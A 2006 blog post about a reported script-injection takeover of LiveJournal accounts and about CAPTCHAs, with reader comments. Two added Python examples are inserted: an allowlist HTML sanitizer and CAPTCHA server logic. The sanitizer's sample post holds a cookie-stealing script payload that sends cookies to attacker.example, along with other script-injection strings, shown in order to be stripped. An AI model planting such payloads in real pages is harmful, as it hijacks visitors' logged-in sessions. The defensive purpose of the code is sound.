Friday, January 20, 2006

This Is Still Not Schadenfreude

Okay, so this next entry is still not an example of Schadenfreude. It might be slightly self-serving, because it shows that everyone has problems, but it's not Schadenfreude.

Brian Krebs, computer security blogger for the Washington Post (there's that name again), blogged about a security problem over at blog provider LiveJournal.

By "security problem", we're talking about a hacker group (or is it "cracker" -- I'm never sure these days; it's like the whole "Trekkie" or "Trekker" thing) claiming to have hijacked more than 900,000 LiveJournal accounts by exploiting a Javascript hole (script slipped into a page so that it runs in other readers' browsers, with whatever those readers are logged in as).

You can check out the entry for more details.

Now, whenever I ask the Journals tech folks why AOL Journals doesn't let users use Javascript, they say "Because of security concerns." As the article mentions, similar Javascript exploits have been used on Xanga and MySpace. So I guess this is the kind of thing they're talking about -- if I were them, I would probably be all up in my face, saying, "See, I told [me] so!"
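Since "security concerns" doesn't say much about what a host actually does when it refuses member script, here is an added example (my code, not Joe's, Krebs's, AOL's or LiveJournal's) of the usual control: an allowlist filter over a submitted post, built on Python's standard html.parser, that rebuilds the post from only the tags and attributes the host permits. The tag and attribute lists, the sample post and the attacker.example address are made up for the illustration.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist for a blog host that, like AOL Journals, refuses to
# let members run script: only these tags and attributes survive a post.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(url):
    # Keep only relative links and http(s)/mailto ones. Control characters are
    # removed first because browsers ignore them inside a scheme, so a tab in
    # the middle of "javascript:" would otherwise slip past a prefix check.
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class PostSanitizer(HTMLParser):
    # Rebuilds a post from the parse events, emitting only allowlisted markup.
    # Text is always re-escaped, so nothing the author typed is trusted.

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed tags opened so far, to keep output balanced
        self.skip_depth = 0   # > 0 while inside <script>/<style>; that text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # e.g. <img onerror=...> vanishes; any inner text still comes through
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # every on* handler and style= is dropped here
            if name == "href" and not safe_url(value or ""):
                continue  # javascript:, data:, vbscript: links are dropped
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        if tag == "a":
            kept.append(' rel="nofollow"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <br/> is treated like <br>
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if tag in self.open_tags:
            # close it and anything left open inside it, so nesting stays valid
            while True:
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped; they are a classic place to hide script


def sanitize_post(html):
    parser = PostSanitizer()
    parser.feed(html)
    parser.close()                       # flushes any buffered trailing text
    while parser.open_tags:              # close whatever the author left open
        parser.out.append(f"</{parser.open_tags.pop()}>")
    return "".join(parser.out)


# Constructed sample post in the style of the worms that hit blog hosts:
# a cookie-stealing script, an event handler and a javascript: link.
EVIL_POST = (
    '<p>Check out my <b>new</b> journal layout!</p>'
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)" onclick="steal()">click me</a> '
    '<a href="http://example.com/friend">real link</a>'
    '<b onmouseover="steal()">hover</b> &lt;script&gt;not really a tag&lt;/script&gt;'
)

if __name__ == "__main__":
    print(sanitize_post(EVIL_POST))
```

Run it and the script block, the onerror image and the javascript: link disappear while the harmless markup and the real link survive. Two details are worth noticing: the parser decodes attribute values before the scheme check, so an href written as &#106;avascript: is still caught, and control characters are stripped because browsers ignore them inside a scheme. A denylist that hunts for the string "<script" would miss both; an allowlist never has to know what the attack looks like.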

This is not to say that anything can ever be completely bulletproofed. One of the keys to security -- any kind of security, online or offline -- is managing the balance between protection and convenience. For example, you could design a security system that's so effective and so cumbersome that no one -- including legitimate users -- would use it.

Another takeaway from the article involves CAPTCHAs, those swirly pictures of letters and numbers that are hard for computers to read, and slightly less hard for humans to read.

The theory behind CAPTCHAs is that you have to complete the test to prove you're human -- this is to stymie automated software robots (or bots), used for everything from creating spam blogs, to leaving spam comments, to sending spam, to hacking user accounts so that they can be used to send spam (notice a trend?).

As I've said before, CAPTCHAs are not bulletproof either, but to date, they have been pretty effective (if annoying), so this is just another example of the ongoing race of security measures and countermeasures.
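What "complete the test to prove you're human" amounts to on the server side, as an added example (my code, not anything from the post, LiveJournal or AOL): a challenge is issued with a short life, can be answered exactly once, and is compared in constant time. Drawing the distorted image is left out; the in-memory store, the six-character answer and the five-minute lifetime are assumptions.

```python
import hmac
import secrets
import time

# Confusable glyphs (0/O, 1/I) are left out; humans misread them far more
# often than software does, which is the "slightly less hard" problem.
ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
ANSWER_LENGTH = 6
TTL_SECONDS = 300          # assumption: five minutes to answer
_pending = {}              # challenge id -> (answer, expiry); assumption: one process


def _prune(now):
    """Forget challenges nobody answered, so the store cannot grow without bound."""
    for cid in [c for c, (_, expiry) in _pending.items() if expiry < now]:
        del _pending[cid]


def new_challenge(now=None):
    """Issue a challenge. Returns (challenge_id, answer): the caller renders
    the answer as the distorted image and sends only the id to the browser."""
    now = time.time() if now is None else now
    _prune(now)
    answer = "".join(secrets.choice(ALPHABET) for _ in range(ANSWER_LENGTH))
    cid = secrets.token_urlsafe(16)          # unguessable, so ids cannot be enumerated
    _pending[cid] = (answer, now + TTL_SECONDS)
    return cid, answer


def check_answer(cid, submitted, now=None):
    """True only for the first, in-time, correct answer to a live challenge."""
    now = time.time() if now is None else now
    entry = _pending.pop(cid, None)          # consumed on first use, right or wrong
    if entry is None:
        return False                         # unknown, already used, or pruned
    answer, expiry = entry
    if expiry < now:
        return False                         # too slow; the window limits offline solving
    guess = submitted.strip().upper().encode()
    return hmac.compare_digest(answer.encode(), guess)   # constant-time compare


if __name__ == "__main__":
    cid, answer = new_challenge()
    print("challenge", cid, "would be drawn as", answer)
    print("first correct answer accepted:", check_answer(cid, answer.lower()))
    print("replayed answer accepted:", check_answer(cid, answer))
```

The pop() is the line that matters: a challenge is consumed on the first answer whether right or wrong, so a bot cannot grind through guesses against one challenge, and a solved answer cannot be replayed on a second form submission. The expiry does the rest of the work, since a challenge that stays valid for hours is one that can be handed off and solved elsewhere.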

Thanks -- Joe

3 comments:

Anonymous said...

cool beans Joe
nat

Anonymous said...

LiveJournal does not allow Javascript. I know because I have an LJ and can't add some things I wanted, like Moon Phases.

CAPTCHAs might work fairly well, but they're unusable by visually impaired and blind bloggers.

There's always a downside to every upside.

Anonymous said...

Use whatever influence that you have there to see that AOL doesn't use CAPTCHA... I have enough trouble reading what I write, let alone THAT nonsense.